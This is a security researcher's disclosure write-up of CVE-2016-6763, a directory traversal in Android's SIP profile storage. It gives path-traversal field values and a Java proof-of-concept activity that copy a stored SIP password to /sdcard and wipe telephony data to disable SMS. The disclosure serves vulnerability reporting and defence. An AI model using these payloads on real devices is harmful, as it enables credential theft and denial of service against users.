Details of Denial of service vulnerability in Telephony

责任编辑：支书Woojune

0x00

Summary

This month Google has fixed a vulnerability we reported. According to the Android Security Bulletin, this is a denial of service vulnerability in Telephony  that could enable a local malicious application to use a specially crafted file to cause a device hang or reboot. This issue is rated as High due to the possibility of local permanent denial of service. 

CVE: CVE-2016-6763

BugID: A-31530456

Severity: High

Updated Google devices: All

Updated AOSP versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0

0x01

Vulnerability Details

There is a directory traversal vulnerability in SipProfileDb.java. In deleteProfile, saveProfile and retrieveSipProfileFromName methods, the sip profile name without checking is simply concatenated with the sip profile directory. As the sip profile name is sometime controlled by outside and permitted to use some evil characters like '/' and '.' , which gives an attacker a chance to write the sip profile directory and its serialized file to any location belongs to user radio.

0x02

How to Exploit

The bug gives an attacker or tricked user with physical access to the phone the ability to make a new directory under data directories owned by radio, whose name is controlled, or to remove a directory with all of its files under data directories owned by radio. I tested the bug in a Nexus 6P device with Android 6.0.1 and didn't find other automation exploiting method.  I didn't know if Google has found other exploiting methods by local malicious application in other Google devices or other Android versions, either. Thank Google, they still rated the issue High and gave me a credit which is my first one in Android Security Bulletin.

#1 Steal the SIP password

Suppose the phone already has a sip account: alice@CompromisedSite and the password is "12345".
1. Open Call settings ->Calling accounts->Sip accounts, update existing sip account.
2. Modify the existed account "alice" to “alice/“ in the Username of the account and “CompromisedSite/../../../../../../../../sdcard/“ in Server field, leaving other fields unchanged including password, then press save.

The sip account configuration file including the original password will appear in sdcard directory. The orignal password "12345" which is a plain text can be simply found by cat the file.

shell@angler:/sdcard $ ls -a -l
-rw-rw---- root sdcard_rw 1843 2016-09-12 14:58 .pobj

#2  Disable SMS or Telephone function

1. Open Call settings ->Calling accounts->Sip accounts, press “+” to add a new sip account.
2. Fill “alice/“ in Username and “somesite/../../../../../../../../data/data/com.android.providers.telephony/“ in Server field. Just fill whatever you like in Password. Then Press Save.

3. The account will never show in SIP accounts ListView because com.android.phone will check if the directory name  of the configuration directory  match the sip profile name in the serialized file.

4. Use the POC to trigger the SipEditor to show the original account again.

public class MainActivity extends AppCompatActivity {

   Button m_btn = null;

   @Override
   protected void onCreate(Bundle savedInstanceState) {
       super.onCreate(savedInstanceState);
       setContentView(R.layout.activity_main);

       m_btn = (Button)findViewById(R.id.siptest);

       m_btn.setOnClickListener(new View.OnClickListener() {
           @Override
           public void onClick(View v) {
               Intent i = new Intent();
               i.setComponent(new ComponentName("com.android.phone",
                       "com.android.services.telephony.sip.SipPhoneAccountSettingsActivity"));

               PhoneAccountHandle handle = new PhoneAccountHandle(new ComponentName("com.android.phone",
                       "com.android.services.telephony.sip.SipConnectionService"),
                       "alice/@somesite/../../../../../../../../data/data/com.android.providers.telephony/");
               i.putExtra(TelecomManager.EXTRA_PHONE_ACCOUNT_HANDLE, handle);

               startActivity(i);
           }
       });
   }
}

5. Modify the Server field to “somesite/../../../../../../../../data/data/com.android.providers.telephony/databases/mmssms.db” and press SAVE which will remove any files under com.android.providers.telephony, then make a fake databases/mmssms.db under it.

At this time, the SMS function is disabled. The Nexus6P device cannot receive nor send any SMSs.

Logcat shows sqlite error cause we put a fake mmssms.db under com.android.providers.telephony/databases/ which prevents the real mmssms.db to recover. If we put fake telephony.db or other important files under /data/misc/radio/, It could cause other security impact on radio.

09-14 10:19:44.593  3862  4522 E SQLiteLog: (1032) statement aborts at 58: [UPDATE sms SET read=?,seen=? WHERE thread_id=1 AND date<=9223372036854775807 AND read=0]
09-14 10:19:44.593  3862  4522 E DatabaseUtils: Writing exception to parcel
09-14 10:19:44.593  3862  4522 E DatabaseUtils: android.database.sqlite.SQLiteReadOnlyDatabaseException: attempt to write a readonly database (code 1032)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteConnection.nativeExecuteForChangedRowCount(Native Method)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteConnection.executeForChangedRowCount(SQLiteConnection.java:732)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteSession.executeForChangedRowCount(SQLiteSession.java:754)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteStatement.executeUpdateDelete(SQLiteStatement.java:64)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteDatabase.updateWithOnConflict(SQLiteDatabase.java:1576)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.database.sqlite.SQLiteDatabase.update(SQLiteDatabase.java:1522)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at com.android.providers.telephony.SmsProvider.update(SmsProvider.java:744)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.content.ContentProvider$Transport.update(ContentProvider.java:355)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.content.ContentProviderNative.onTransact(ContentProviderNative.java:222)
09-14 10:19:44.593  3862  4522 E DatabaseUtils:            at android.os.Binder.execTransact(Binder.java:453)

Only through a factory reset can the SMS function be recovered.

0x03

Timeline

2016–09-12: Android bug reported to Google
2016-10-04: Android bug confirmed and the severity is set to High
2016-12-05: Android security bulletin released with fix
2016-12-08: Public disclosure

版权声明：

本文由MS509团队成员原创，转载请注明来源

MS509简介：

 

MS509为“中国网安”开展互联网攻防技术研究的专业团队，当前主攻方向包括WEB安全、移动安全、二进制安全等**。****更多团队动态，尽在www.ms509.com**

↓↓↓ 点击"阅读原文" 【查看更多信息】